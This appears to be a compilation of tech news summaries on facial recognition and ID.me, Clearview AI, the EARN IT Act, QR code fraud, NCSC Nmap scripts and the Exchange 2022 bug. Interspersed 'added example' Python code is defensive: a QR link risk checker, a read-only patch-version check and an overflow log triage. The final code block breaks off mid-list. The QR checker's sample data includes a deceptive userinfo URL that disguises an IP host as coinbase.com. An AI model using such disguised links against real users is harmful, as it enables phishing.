Privacy

IRS To Adopt Login.gov As User Authentication Tool (fedscoop.com)

An anonymous reader quotes a report from FedScoop: The Internal Revenue Service has committed to Login.gov as a user authentication tool after earlier this month agreeing to abandon the use of a commercial tool that featured third-party facial recognition technology. In a statement on Monday, the Treasury Department said it is working with the General Services Administration to achieve the "security standards and scale" required to adopt the platform.

It comes after IRS earlier this month announced a plan to move away from using a third-party service for facial recognition to authenticate taxpayers creating new online accounts. It was forced to reject the technology following revelations that contractor ID.me uses powerful one-to-many facial recognition technology. "While this short-term solution is in place for this year's filing season, the IRS will work closely with partners across government to roll out login.gov as an authentication tool," IRS said.

While Login.gov is not expected to be ready in time for use by taxpayers during the current tax season, users are now able to sign up for IRS online accounts without the use of any biometric data. Any previously collected biometric data will also be deleted over the next few weeks, according to IRS. Despite the move to Login.gov, taxpayers will still have the option to verify their identity automatically through ID.me's tool if they choose. New requirements are in place to ensure images provided are deleted for the account being created.
The IRS said in a statement: "Taxpayers will have the option of verifying their identity during a live, virtual interview with agents; no biometric data -- including facial recognition -- will be required if taxpayers choose to authenticate their identity through a virtual interview."
AI

100 Billion Face Photos? Clearview AI Tells Investors It's On Track to Identify 'Almost Everyone in the World' (msn.com)

The Washington Post reports: Clearview AI is telling investors it is on track to have 100 billion facial photos in its database within a year, enough to ensure "almost everyone in the world will be identifiable," according to a financial presentation from December obtained by The Washington Post.

Those images — equivalent to 14 photos for each of the 7 billion people on Earth — would help power a surveillance system that has been used for arrests and criminal investigations by thousands of law enforcement and government agencies around the world. And the company wants to expand beyond scanning faces for the police, saying in the presentation that it could monitor "gig economy" workers and is researching a number of new technologies that could identify someone based on how they walk, detect their location from a photo or scan their fingerprints from afar.

The 55-page "pitch deck," the contents of which have not been reported previously, reveals surprising details about how the company, whose work already is controversial, is positioning itself for a major expansion, funded in large part by government contracts and the taxpayers the system would be used to monitor. The document was made for fundraising purposes, and it is unclear how realistic its goals might be. The company said that its "index of faces" has grown from 3 billion images to more than 10 billion since early 2020 and that its data collection system now ingests 1.5 billion images a month.

With $50 million from investors, the company said, it could bulk up its data collection powers to 100 billion photos, build new products, expand its international sales team and pay more toward lobbying government policymakers to "develop favorable regulation."

The article notes that major tech companies like Amazon, Google, IBM and Microsoft have all limited or ended their own sales of facial recognition technology, adding that Clearview's presentation simply describes this as a major business opportunity for itself.

In addition, the Post reports Clearview's presentation brags "that its product is even more comprehensive than systems in use in China, because its 'facial database' is connected to 'public source metadata' and 'social linkage' information."
Security

FBI Sounds Alarm as QR Code Usage Soars (axios.com)

The pandemic has accelerated the usage of QR codes, taking them from niche status to an essential tool for businesses and marketers. From a report: Look no further than Sunday's Super Bowl commercial of nothing but a floating QR code sending users to the website of Coinbase. [...] Law enforcement officials are sounding the alarm about the risks. The FBI issued an alert in January warning Americans that cybercriminals "are tampering with QR codes to redirect victims to malicious sites that steal login and financial information." If you're scanning a physical code, make sure it hasn't been tampered with. For example, watch out for "a sticker placed on top of the original code," the FBI advises.
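A scanner-side check for the tampering the FBI describes, added here as an example and not code from the FBI alert or the Axios report: before a browser is pointed at whatever a code decodes to, parse the payload and flag the things a sticker over a legitimate code typically relies on (plain http, a link shortener that hides the destination, an IP-literal or punycode host, a `user@host` trick that makes the visible name differ from the real host, and a host that is not the one the poster or ad claims). The sample payloads, the domain names and the `SHORTENERS` list are constructed for the example.

```python
"""Flag risky QR payloads before a browser is pointed at them (added example)."""
from __future__ import annotations

from ipaddress import ip_address
from urllib.parse import urlsplit

# Link shorteners hide the real destination behind a redirect, which is exactly
# what a sticker over a legitimate code wants. (Constructed, non-exhaustive list.)
SHORTENERS = {"bit.ly", "tinyurl.com", "t.co", "goo.gl", "ow.ly", "is.gd", "cutt.ly"}


def inspect_qr_payload(payload: str, expected_hosts: tuple[str, ...] = ()) -> list[str]:
    """Return risk flags for the text a QR scanner decoded.

    An empty list means no red flag was found, not that the link is safe.
    `expected_hosts` are the domains the poster, menu or ad claims to point at;
    anything outside them (or their subdomains) is flagged.
    """
    flags: list[str] = []
    text = payload.strip()
    if "://" not in text:
        # Wi-Fi credentials, vCards, mailto:/tel:, plain text: not a web link.
        return ["not-a-url"]
    parts = urlsplit(text)
    if parts.scheme.lower() != "https":
        flags.append("plain-http")
    if "@" in parts.netloc:
        # https://coinbase.com@198.51.100.7/ : the visible name is user info,
        # the real host is whatever follows the '@'.
        flags.append("userinfo-in-url")
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        flags.append("no-host")
        return flags
    try:
        ip_address(host)
        flags.append("ip-literal-host")
    except ValueError:
        pass
    if any(label.startswith("xn--") for label in host.split(".")):
        flags.append("punycode-host")  # IDN homograph of a familiar name
    if host in SHORTENERS:
        flags.append("shortener")
    try:
        if parts.port not in (None, 443):
            flags.append("nonstandard-port")
    except ValueError:
        flags.append("bad-port")
    if expected_hosts and not any(
        host == e or host.endswith("." + e) for e in expected_hosts
    ):
        flags.append("unexpected-host")
    return flags


# Constructed payloads (not from the article) as a scanner app might decode them.
SAMPLE_PAYLOADS = {
    "https://www.coinbase.com/wagmi": ("coinbase.com",),
    "http://bit.ly/3abcd": ("coinbase.com",),
    "https://coinbase.com@198.51.100.7/login": ("coinbase.com",),
    "WIFI:T:WPA;S:cafe;P:hunter2;;": (),
}


def scan_samples() -> dict[str, list[str]]:
    """Run the check over the constructed payloads; keyed by payload."""
    return {p: inspect_qr_payload(p, hosts) for p, hosts in SAMPLE_PAYLOADS.items()}


if __name__ == "__main__":
    for payload, flags in scan_samples().items():
        print(f"{'OK  ' if not flags else 'RISK'} {payload}  {flags}")
```

The physical check the FBI recommends (look for a sticker over the original) still comes first; this only catches what survives the decode step, and a clean result for a code that was printed by the attacker in the first place proves nothing.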
Google

Shortwave, a Startup By Former Google Employees, Wants To Bring Back Google Inbox (techcrunch.com)

An anonymous reader shares a report: Google's Inbox experiment was a glorious thing while it lasted. Launched as an invitation-only service in 2014, it was the company's next-gen email client. Because it was so good, it's no surprise Google shut it down in 2019. Thankfully, though, a group of ex-Google/Firebase employees is now resurrecting the Inbox experience -- with a bit of the Slack user experience mixed in, too.

As Lee told me, the team took two important inspirations from Inbox. "One is the idea that you should work with your email in groups," he said, referring to Inbox's ability to bundle emails by topic. "As the volume of email grows in your inbox, it becomes impractical just to page through every single email. Even if you have all the keyboard shortcuts and your app is super optimized, just scanning through all that stuff takes a long time." While you want to know about automated emails like calendar notifications, for example, chances are you've already accepted those invites in your calendar, so marking all of those as read or snoozing them for later with a couple of clicks saves a lot of time. In addition, the team also built Shortwave with the idea that your inbox, whether you like it or not, is a to-do list.

Bitcoin

Coinbase Swears This All Isn't Like the Dotcom Bubble After Super Bowl Ad SNAFU (vice.com)

An anonymous reader quotes a report from Motherboard: The most insufferable part of every Super Bowl Sunday has historically, without fail, been the ads. This year was no exception, with an unrelenting barrage of ads trying to manifest the metaverse, convince viewers they're missing out on crypto, and lure new blood to online and physical casinos. Results were mixed. Coinbase, in one ad named WAGMI ("we're all going to make it"), crafted an advertisement that bounced a QR code around the screen, changing colors each time it hit the edge like an old-school DVD menu. Scanning the QR code (which immediately forfeits your right to enter heaven) takes the user to this page, where Coinbase offers $15 in Bitcoin for signing up as well as a chance to enter a contest to win one of three prizes for $1 million worth of Bitcoin. The linked webpage went down almost immediately thanks to the increased traffic from the ad, and ridicule at the idea of paying millions of dollars to send millions of viewers to a down site poured in from around the web.

To Coinbase, though, the ad was a success. In a blog post congratulating itself on the advertisement and interviewing Coinbase Chief Marketing Officer Kate Rouch about why the ad was so good, the company revealed it saw "20M+ hits on our landing page in one minute" which "led to us temporarily throttling our systems." Chief executive Brian Armstrong took to Twitter to gloat about the ad: ranked #1 by AdWeek and peaking at #2 in the Apple App Store, just ahead of apps for the Pepsi Super Bowl Halftime Show and the NFL. As it turns out, putting up nothing but a QR code in the middle of a widely-watched sports event and offering free money as well as a chance to win $3 million is a good way to build interest in your app. When Motherboard reached out to Coinbase about the ad, the company directed Motherboard to Rouch's blog post and reiterated its main points.

While taking a victory lap for the apparent success of its ad, Coinbase took the time to explain why this is definitely not at all like the dotcom bubble, which many critics have said is an apt comparison for Sunday's ads. "There have been a lot of comparisons to the dot.com era and speculation that many of the crypto companies advertising in this year's Super Bowl will inevitably fail," said Rouch in Coinbase's blog post. "We don't think about it that way and judging from the early response we've seen, Super Bowl viewers don't either." Rouch insisted that the sheer number of crypto ads in the Super Bowl was "yet another signal that crypto is bursting into the mainstream, and at the center of the cultural zeitgeist."
Further reading: This Year's Super Bowl Broadcast May Seem 'Crypto-Happy'. But the NFL Isn't
Privacy

Will ID.Me Destroy the Data of the 7 Million Americans Already Directed to Its Face-Scanning Service? (msn.com)

America's Internal Revenue Service abandoned plans to make face-scanning mandatory for access to your tax records.

Unfortunately, before this change of heart the IRS had already directed 7 million Americans to facial recognition vendor ID.me, reports the Washington Post. Now the chair of the House Oversight Committee is urging IRS Commissioner Charles Rettig to instruct ID.me to destroy the biometric data and ensure the data isn't used for "unapproved or unauthorized purposes." "Those Americans' highly personal information may continue to be held by a third party outside of the IRS's direct control — increasing the potential for exposure due to bad actors and other cybersecurity incidents," [head of the committee] Maloney wrote.... ID.me said on Wednesday that it would drop the facial recognition requirement in its software, which is used by 30 states and 10 federal agencies. The company also told The Washington Post that effective March 1, anyone would be able to delete their selfie or photo data....

The letter follows years of controversy over the government's expanding use of facial recognition software, despite warnings from the General Services Administration that the face-scanning technology has too many problems to justify its use.... There is no federal law regulating how facial recognition can be used or how it should be secured....

Maloney also writes that 13 percent of ID.me users since June had struggled to use the software and were referred to customer service, where representatives would attempt to verify their identities over video chat. The letter says this underscores the "widespread issues related to the use of the nascent facial recognition technology."

In fact, the Verge reports that "Internal documents and former ID.me employees say the company was beset by disorganization and staffing shortages throughout 2021, as shortcomings in the automated systems created tensions among the company's workforce, particularly the human verification workers who have to step in when the algorithms fail." Current and former employees who spoke to The Verge paint a picture of a company described as being in "permanent crisis mode," changing policies rapidly to keep up with fluctuating demand for its services and fight a slew of negative press. In particular, they say a lack of human review capacity has been a chokepoint for the company, leading to stress, pressure, and a failure to meet quality standards. It's an unexpected challenge for a biometrics system that's usually seen as automatic, pointing to the often-ignored workers needed to support automated systems at scale.

When the automated systems fail — ID.me says roughly 10 percent of users will need video chat assistance — it's workers and subjects who are left to manage the consequences.... To keep up with demand, the company added 1,300 new employees between January and September 2021, including 500 to be based in a new office in Tampa, Florida, dedicated to customer support. But as adoption increased, so did complaints. A Vice report found dozens of complaints from applicants who said they had been locked out of unemployment benefits when ID.me's verification service had failed to identify them. When the automated system failed, applicants often faced long wait times to reach human reviewers, according to the report — wait times that became even more burdensome and difficult to navigate for people without access to reliable internet connections....

Many staff were unhappy about the end of work-from-home policies, which were being phased out at the company at the same time as first the delta and then omicron variants hit the US. As in-office staffing levels rose, more ID.me employees began to contract COVID at work, sources said, in some cases taking whole teams offline at once.

One ID.me employee complained to the Verge that "In terms of worker treatment, it's like the Amazon of identity protection."

The article also notes that an ID.me video chat agent was terminated after engaging in "inappropriate conduct," and while the company added new procedures to prevent this, "sources said that these quality checks have begun to fall by the wayside under the pressure of clearing through the backlog of video verification requests."
AI

Clearview AI Is Working On Augmented Reality Goggles For Air Force Security (gizmodo.com)

An anonymous reader quotes a report from Gizmodo: Clearview AI, the shady face recognition firm which claims to have landed contracts with federal, state, and local cops across the country, has landed a roughly $50,000 deal with the U.S. military for augmented reality glasses. First flagged by Tech Inquiry's Jack Poulson, Air Force procurement documents show that it awarded a $49,847 contract to Clearview AI for the purposes of "protecting airfields with augmented reality facial recognition; glasses." The contract is designated as part of the Small Business Innovation Research (SBIR) program, meaning that Clearview's contract is to determine for the Air Force whether such applications are feasible.

Bryan Ripple, a media lead at the Air Force Research Laboratory Public Affairs, told Gizmodo via email that Clearview will conduct a three-month study under which "no glasses or units are being delivered under contract," nor are any prototypes. Clearview, he wrote, stipulated "that security personnel are vulnerable while their hands are occupied with scanners and ID cards" and AR goggles would allow them to "remain hands-free and ready during this timeframe." "Clearview AI's Augmented Reality (AR) Glasses perform facial recognition scanning to vet backgrounds and restrict unauthorized individuals from entering bases and flightlines," Ripple wrote. "This 100% hands-free identity verification wearable device allows Defenders to keep their weapons at the ready, increase standoff and social distance, and confirm authorized base access using rapid and accurate facial biometrics while keeping threats distant. The results are improved safety at entry control points and for bases, faster identity verification without manual ID card checks, and cost savings by replacing the need for large permanent camera installations."

In a promotional document shared by the Air Force, Clearview argued that in the time it takes to scan an ID card at the entry point to a military facility, "A criminal or terrorist can pull a gun, knife, or weapon during this brief but critical moment, kill the Defender, and access the base." They argued the AR glasses would increase "standoff distance," save guards time while vetting high volumes of traffic and allow them to maintain distance from anyone contagious with diseases.

Privacy

It's Back: Senators Want 'EARN IT' Bill To Scan All Online Messages (eff.org)

A group of lawmakers have re-introduced the EARN IT Act, an incredibly unpopular bill from 2020 that "would pave the way for a massive new surveillance system, run by private companies, that would roll back some of the most important privacy and security features in technology used by people around the globe," writes Joe Mullin via the Electronic Frontier Foundation. "It's a framework for private actors to scan every message sent online and report violations to law enforcement. And it might not stop there. The EARN IT Act could ensure that anything hosted online -- backups, websites, cloud photos, and more -- is scanned." From the report: The bill empowers every U.S. state or territory to create sweeping new Internet regulations, by stripping away the critical legal protections for websites and apps that currently prevent such a free-for-all -- specifically, Section 230. The states will be allowed to pass whatever type of law they want to hold private companies liable, as long as they somehow relate their new rules to online child abuse. The goal is to get states to pass laws that will punish companies when they deploy end-to-end encryption, or offer other encrypted services. This includes messaging services like WhatsApp, Signal, and iMessage, as well as web hosts like Amazon Web Services. [...]

Separately, the bill creates a 19-person federal commission, dominated by law enforcement agencies, which will lay out voluntary "best practices" for attacking the problem of online child abuse. Regardless of whether state legislatures take their lead from that commission, or from the bill's sponsors themselves, we know where the road will end. Online service providers, even the smallest ones, will be compelled to scan user content, with government-approved software like PhotoDNA. If EARN IT supporters succeed in getting large platforms like Cloudflare and Amazon Web Services to scan, they might not even need to compel smaller websites -- the government will already have access to the user data, through the platform. [...] Senators supporting the EARN IT Act say they need new tools to prosecute cases over child sexual abuse material, or CSAM. But the methods proposed by EARN IT take aim at the security and privacy of everything hosted on the Internet.

The Senators supporting the bill have said that their mass surveillance plans are somehow magically compatible with end-to-end encryption. That's completely false, no matter whether it's called "client side scanning" or another misleading new phrase. The EARN IT Act doesn't target Big Tech. It targets every individual internet user, treating us all as potential criminals who deserve to have every single message, photograph, and document scanned and checked against a government database. Since direct government surveillance would be blatantly unconstitutional and provoke public outrage, EARN IT uses tech companies -- from the largest ones to the very smallest ones -- as its tools. The strategy is to get private companies to do the dirty work of mass surveillance.

Government

Not Just the IRS - 20 US Agencies Are Already Set Up For Selfie IDs (wired.com)

America's Internal Revenue Service created an uproar with early plans to require live-video-feed selfies to verify identities for online tax services (via an outside company called ID.me).

But Wired points out that more than 20 U.S. federal agencies are already using a digital identification system (named Login.gov and built on services from LexisNexis) that "can use selfies for account verification."

It's run by America's General Services Administration, or GSA.... The GSA's director of technology transformation services Dave Zvenyach says facial recognition is being tested for fairness and accessibility and not yet used when people access government services through Login.gov. The GSA's administrator said last year that 30 million citizens have Login.gov accounts and that it expects the number to grow significantly as more agencies adopt the system.

"ID.me is supplying something many governments ask for and require companies to do," says Elizabeth Goodman, who previously worked on Login.gov and is now senior director of design at federal contractor A1M Solutions. Countries including the UK, New Zealand, and Denmark use similar processes to ID.me's to establish digital identities used to access government services. Many international security standards are broadly in line with those of the U.S., written by the National Institute of Standards and Technology (NIST).

Goodman says that such programs need to provide offline options such as visiting a post office for people unable or unwilling to use phone apps or internet services....

In fact, Wired argues that in many cases, a selfie or biometric data is virtually required by U.S. federal security guidelines from 2017: NIST's 2017 standard says that access to systems that can leak sensitive data or harm public programs should require verifying a person's identity by comparing them to a photo — either remotely or in person — or using biometrics such as a fingerprint scanner. It says that a remote check can be done either by video with a trained agent, or using software that checks for an ID's authenticity and the "liveness" of a person's photo or video.... California's Employment Development Department said that ID.me blocked more than 350,000 fraudulent claims in the last three months of 2020. But the state auditor said an estimated 20 percent of legitimate claimants were unable to verify their identities with ID.me.

Caitlin Seeley George, director of campaigns and operations with nonprofit Fight for the Future, says ID.me uses the specter of fraud to sell technology that locks out vulnerable people and creates a stockpile of highly sensitive data that itself will be targeted by criminals. ...

Government

IRS 'Looking Into' Alternatives to Face-Scanning After Privacy Complaints - and Long Wait Times (msn.com)

Last week America's Internal Revenue Service announced that a live-video-feed verification of taxpayers' faces would be required by this summer to access online tax services. But now the Washington Post reports that "complaints of confusing instructions and long wait times to complete the sign-up have caused an unknown number to abandon the process in frustration."

"The $86 million ID.me contract with the IRS also has alarmed researchers and privacy advocates who say they worry about how Americans' facial images and personal data will be safeguarded in the years to come." There is no federal law regulating how the data can be used or shared. While the IRS couldn't say what percentage of taxpayers use the agency's website, internal data show it is one of the federal government's most-viewed websites, with more than 1.9 billion visits last year. The partnership with ID.me has drawn anger from some members of Congress, including Sen. Ron Wyden (D-Ore.), who tweeted that he was "very disturbed" by the plan and would push the IRS for "greater transparency." Rep. Ted Lieu (D-Calif.) called it "a very, very bad idea by the IRS" that would "further weaken Americans' privacy." The Senate Finance Committee is working to schedule briefings with the IRS and ID.me on the issue, a committee aide said.... "No one should be forced to submit to facial recognition as a condition of accessing essential government services," Wyden said in a separate statement. "I'm continuing to seek more information about ID.me and other identity verification systems being used by federal agencies."

A Treasury official said Friday that the department was "looking into" alternatives to ID.me, saying Treasury and the IRS always are interested in improving "taxpayers' experience...."

About 70 million Americans who have filed for unemployment insurance, pandemic assistance grants, child tax credit payments or other services already have been scanned by the McLean, Va.-based company, which says its client list includes 540 companies; 30 states, including California, Florida, New York and Texas; and 10 federal agencies, including Social Security, Labor and Veterans Affairs.... Equifax, the credit-reporting company that previously confirmed taxpayers' data for the IRS, had its $7 million contract suspended in 2017 after hackers exposed the personal information of 148 million people...

[ID.me] says 9 of 10 applicants can verify their identity through a self-service face scan in five minutes or less. Anyone who hits a snag is funneled into the backup video-chat verification process...But some who have tried to verify their identities through ID.me for other purposes have reported agonizing delays: cryptic glitches in Colorado, website errors in Arizona, five-hour waits in North Carolina, days-long waits in California and weeks-long benefit delays in New York. The security blogger Brian Krebs wrote last week that he faced a three-hour wait trying to confirm his IRS account, three months before the tax-filing deadline.... The company said it intends to expand its workforce beyond the 966 agents who now handle video-chat verification for the entire country. It has also opened hundreds of in-person identity-verification centers — replicating, in essence, what government offices have done for decades.

The article also points out that advertising is also a key part of ID.me's operation, with people signing up through their web site asked if they want to subscribe to "offers and discounts" — though the company stresses people do have to opt in. And in addition, the article adds, "If a person is using ID.me to confirm their identity with a government agency, the company will not use that verification information for 'marketing or promotional purposes,' the company's privacy policy says."

But a senior counsel at the Electronic Privacy Information Center complained to the Post that "We haven't even gone the step of putting regulations in place and deciding if facial recognition should even be used like this. We're just skipping right to the use of a technology that has clearly been shown to be dangerous and has issues with accuracy, disproportionate impact, privacy and civil liberties."

A spokesperson for the U.S. Treasury Department also told Bloomberg News "that any taxpayer who does not want to use ID.me can opt against filing his or her taxes online." "We believe in the importance of protecting the privacy of taxpayers, while also ensuring criminals are not able to gain access to taxpayer accounts," LaManna added, arguing that it's been "impossible" for the IRS to develop its own cutting-edge identification program because of "the lack of funding for IRS modernization."
United Kingdom

UK Government Plans To Release Nmap Scripts for Finding Vulnerabilities (therecord.media)

The UK government's cyber-security agency plans to release Nmap scripts in order to help system administrators in scanning their networks for unpatched or vulnerable devices. From a report: The new project, titled Scanning Made Easy (SME), will be managed by the UK National Cyber Security Centre (NCSC) and is a joint effort with Industry 100 (i100), a collaboration between the NCSC and the UK private sector. "When a software vulnerability is disclosed, it is often easier to find proof-of-concept code to exploit it, than it is to find tools that will help defend your network," the NCSC said yesterday. "To make matters worse, even when there is a scanning script available, it can be difficult to know if it is safe to run, let alone whether it returns valid scan results."

The NCSC said that the SME project was created to solve this problem by having some of the UK's leading security experts, from both the government and public sector, either create or review scripts that can be used to scan internal networks. Approved scripts will be made available via the NCSC's SME GitHub project page, and the agency said it is also taking submissions from the security community. Only scripts for the Nmap network scanning app will be made available through this project, the NCSC said on Monday.
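What an SME-style check amounts to in practice, as an added illustration rather than any script the NCSC has published: grab the service banner, parse the version, compare it with the version the advisory says is fixed, and report. The product name "ExampleSSH", its banner format and the fixed version 3.2.1 are hypothetical stand-ins (no real product or CVE is meant), and the sample banners are constructed. It is written in Python so it runs without Nmap; an NSE script would do the same in Lua against Nmap's version-detection output.

```python
"""Banner-based 'is it patched?' check in the style of an SME script (added example)."""
from __future__ import annotations

import re
import socket

# Hypothetical advisory for a hypothetical product: "ExampleSSH" releases
# before 3.2.1 are affected and 3.2.1 fixes it. None of this refers to a real CVE.
FIXED_VERSION = (3, 2, 1)
BANNER_RE = re.compile(r"^SSH-2\.0-ExampleSSH_(\d+(?:\.\d+)*)")


def parse_version(text: str, width: int = len(FIXED_VERSION)) -> tuple[int, ...]:
    """'3.2' -> (3, 2, 0) so that it compares correctly against (3, 2, 1)."""
    parts = tuple(int(p) for p in text.split("."))
    return parts + (0,) * (width - len(parts))


def assess_banner(banner: str) -> str:
    """Classify a raw banner as 'vulnerable', 'patched' or 'unknown'.

    'unknown' covers other products and anything the regex cannot read. A
    banner check also cannot see distribution backports that fix the bug
    without bumping the version string, so 'vulnerable' is a lead to confirm
    against the vendor advisory, not proof.
    """
    match = BANNER_RE.match(banner.strip())
    if not match:
        return "unknown"
    return "vulnerable" if parse_version(match.group(1)) < FIXED_VERSION else "patched"


def grab_banner(host: str, port: int = 22, timeout: float = 3.0) -> str:
    """Read the line an SSH server sends unprompted. Sends nothing: safe to run."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.settimeout(timeout)
        return sock.recv(256).decode("ascii", "replace").strip()


def check_host(host: str, port: int = 22) -> dict[str, str]:
    """Live check of one host; not used by the offline dry run below."""
    try:
        banner = grab_banner(host, port)
    except OSError as exc:
        return {"host": host, "state": "unreachable", "detail": str(exc)}
    return {"host": host, "state": assess_banner(banner), "banner": banner}


# Constructed banners for an offline dry run; not output from any real scan.
SAMPLE_BANNERS = {
    "10.0.0.5": "SSH-2.0-ExampleSSH_3.1.9",
    "10.0.0.6": "SSH-2.0-ExampleSSH_3.2.1",
    "10.0.0.7": "SSH-2.0-ExampleSSH_3.2",
    "10.0.0.8": "SSH-2.0-OpenSSH_8.9p1 Ubuntu-3",
}


def dry_run(banners: dict[str, str] = SAMPLE_BANNERS) -> dict[str, str]:
    """Verdict per host for the constructed banners."""
    return {host: assess_banner(b) for host, b in banners.items()}


if __name__ == "__main__":
    for host, verdict in dry_run().items():
        print(f"{host:<12} {verdict}")
```

The two properties the NCSC statement is concerned with are visible here: the check is read-only (it never sends an exploit payload), which is what makes a script safe to run on a production network, and a banner-only comparison can misreport hosts whose distribution backported the fix, which is why `unknown` is a separate verdict and why a `vulnerable` result needs confirmation before it is treated as a finding.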

Businesses

Amazon Heads To the Mall With Prototype Clothing Store (apnews.com)

First, Amazon competed with malls. Now, it's moving inside one. From a report: The online retailing giant said Thursday that it plans to open a clothing store in a Southern California mall later this year. It's the latest foray into brick-and-mortar for Amazon, which already sells more than 10% of all clothes in the U.S. The store, which will sell women's and men's clothing as well as shoes and other accessories, will open at Americana at Brand, a mall in Glendale, California. The entry into malls could become another threat to traditional clothing sellers because of the data and shopper insights Amazon may gain, experts say.

Amazon says its algorithms will spit out real-time recommendations as shoppers keep scanning items that they see. Shoppers can also fill out an online survey of their preferences for style and fit. The store will be about 30,000 square feet, similar in size to a Kohl's, but about one-third the size of other department stores like Macy's. However, it will offer more than double the number of styles as traditional stores do because only one of each piece of clothing will be on display, with the rest in the back room. Items are chosen by Amazon curators who also use feedback provided by millions of customers shopping on Amazon.com.

Wireless Networking

Raspberry Pi Can Detect Malware By Scanning For Electromagnetic Waves (gizmodo.com)

An anonymous reader quotes a report from Gizmodo: A team of researchers at France's Research Institute of Computer Science and Random Systems created an anti-malware system centered around a Raspberry Pi that scans devices for electromagnetic waves. As reported by Tom's Hardware, the security device uses an oscilloscope (Picoscope 6407) and H-Field probe connected to a Raspberry Pi 2B to pick up abnormalities in specific electromagnetic waves emitted by computers that are under attack, a technique the researchers say is used to "obtain precise knowledge about malware type and identity."

The detection system then relies on Convolution Neural Networks (CNN) to determine whether the data gathered indicates the presence of a threat. Using this technique, researchers claim they could record 100,000 measurement traces from IoT devices infected by genuine malware samples, and predicted three generic and one benign malware class with an accuracy as high as 99.82%. Best of all, no software is needed and the device you're scanning doesn't need to be manipulated in any way. As such, bad actors won't be successful with their attempts to conceal malicious code from malware detection software using obfuscation techniques. "Our method does not require any modification on the target device. Thus, it can be deployed independently from the resources available without any overhead. Moreover, our approach has the advantage that it can hardly be detected and evaded by the malware authors," researchers wrote in the paper.

Science

Paleontologists Excavate 'Incredibly Detailed' Fossils With Preserved Subcellular Structures (unsw.edu.au)

Slashdot reader BoogieChile writes: Details of an important new fossil site have just been published in the first Science Advances issue of the new year. McGraths Flat, in New South Wales, Australia, was once the location of an oxbow lake in a mesic rainforest. Today, superb examples of fossilised animals and plants from the Miocene epoch have been recovered, showing incredible detail, including melanosomes preserved in feathers of birds and the eyes of fossilised fish.

"The discovery of melanosomes — subcellular organelles that store the melanin pigment — allows us to reconstruct the colour pattern of birds and fishes that once lived at McGraths Flat," said Dr Michael Frese of the University of Canberra, one of the team's leaders. "Interestingly, the colour itself is not preserved, but by comparing the size, shape and stacking pattern of the melanosomes in our fossils with melanosomes in extant specimens, we can often reconstruct colour and/or colour patterns.

"Over the last three years a team of researchers has been secretly excavating the site, discovering thousands of specimens including rainforest plants, insects, spiders, fish and a bird feather," announced the University of New South Wales: "The fossils we have found prove that the area was once a temperate, mesic rainforest and that life was rich and abundant here in the Central Tablelands," said UNSW Sydney palaeontologist Dr Matthew McCurry [one of the team's leaders]. "Many of the fossils that we are finding are new to science and include trapdoor spiders, giant cicadas, wasps and a variety of fish.

"Until now it has been difficult to tell what these ancient ecosystems were like, but the level of preservation at this new fossil site means that even small fragile organisms like insects turned into well-preserved fossils."

Associate Professor Michael Frese, who imaged the fossils using stacking microphotography and a scanning electron microscope, said that the fossils from McGraths Flat show an incredibly detailed preservation. "Using electron microscopy, I can image individual cells of plants and animals and sometimes even very small subcellular structures," Dr Frese said. "The fossils also preserve evidence of interactions between species. For instance, we have fish stomach contents preserved in the fish, meaning that we can figure out what they were eating. We have also found examples of pollen preserved on the bodies of insects so we can tell which species were pollinating which plants."

Bug

'Year 2022' Bug Breaks Email Delivery For Microsoft Exchange On-Premise Servers (bleepingcomputer.com) 146

Kalper (Slashdot reader #57,281) shares news from Bleeping Computer: Microsoft Exchange on-premise servers cannot deliver email starting on January 1st, 2022, due to a "Year 2022" bug in the FIP-FS anti-malware scanning engine.

Starting with Exchange Server 2013, Microsoft enabled the FIP-FS anti-spam and anti-malware scanning engine by default to protect users from malicious email. According to numerous reports from Microsoft Exchange admins worldwide, a bug in the FIP-FS engine is blocking email delivery with on-premise servers starting at midnight on January 1st, 2022.

Security researcher and Exchange admin Joseph Roosen said that this is caused by Microsoft using a signed int32 variable to store the value of a date, which has a maximum value of 2,147,483,647. However, dates in 2022 have a minimum value of 2,201,010,001 or larger, which is greater than the maximum value that can be stored in the signed int32 variable, causing the scanning engine to fail and not release mail for delivery. When this bug is triggered, an 1106 error will appear in the Exchange Server's Event Log stating, "The FIP-FS Scan Process failed initialization. Error: 0x8004005. Error Details: Unspecified Error" or "Error Code: 0x80004005. Error Description: Can't convert "2201010001" to long." Microsoft will need to release an Exchange Server update that uses a larger variable to hold the date to officially fix this bug.

However, for on-premise Exchange Servers currently affected, admins have found that you can disable the FIP-FS scanning engine to allow email to start delivering again... Unfortunately, with this unofficial fix, delivered mail will no longer be scanned by Microsoft's scanning engine, leading to more malicious emails and spam getting through to users.
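The overflow described above, shown as an added example (not Microsoft's or Bleeping Computer's code): a version string is converted into a signed 32-bit field, which fails for any 2022 value, and into a 64-bit field, which does not, followed by a small triage routine an admin could run over Event Log text to separate the Year 2022 failure from other FIP-FS initialization errors. The sample event lines are constructed in the style of the messages quoted in the report.

```python
import re
from typing import List, Optional, Tuple

INT32_MAX = 2 ** 31 - 1  # 2,147,483,647, the limit the report cites


def parse_version(text: str) -> int:
    """Parse a decimal signature-version string into a Python int (no width limit yet)."""
    if not text.isdigit():
        raise ValueError(f"not a decimal version string: {text!r}")
    return int(text)


def store_as(text: str, bits: int) -> int:
    """Convert a version string into a signed integer of the given width, raising on
    overflow: with bits=32 this models the failing engine, with bits=64 the larger field."""
    value = parse_version(text)
    lo, hi = -(2 ** (bits - 1)), 2 ** (bits - 1) - 1
    if not lo <= value <= hi:
        raise OverflowError(f'Can\'t convert "{text}" to int{bits} (max {hi})')
    return value


# Event-log triage: the regex targets the conversion message quoted in the report.
CONVERT_RE = re.compile(r"""Can't convert "(\d+)" to long""")


def classify_event(line: str) -> Optional[str]:
    """'year-2022-overflow' when the quoted value exceeds int32, 'other-fipfs-failure' for
    any other FIP-FS initialization error, None for unrelated lines."""
    if "FIP-FS Scan Process failed initialization" not in line and "Can't convert" not in line:
        return None
    match = CONVERT_RE.search(line)
    if match and int(match.group(1)) > INT32_MAX:
        return "year-2022-overflow"
    return "other-fipfs-failure"


def triage(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line number, classification) for every FIP-FS-related log line."""
    results = []
    for number, line in enumerate(lines, 1):
        label = classify_event(line)
        if label:
            results.append((number, label))
    return results


# Constructed sample lines in the style of the Event Log text quoted above (not real output).
SAMPLE_EVENTS = [
    "Event 1106: The FIP-FS Scan Process failed initialization. Error: 0x80004005. "
    "Error Details: Unspecified Error",
    'Event 1106: Error Code: 0x80004005. Error Description: Can\'t convert "2201010001" to long.',
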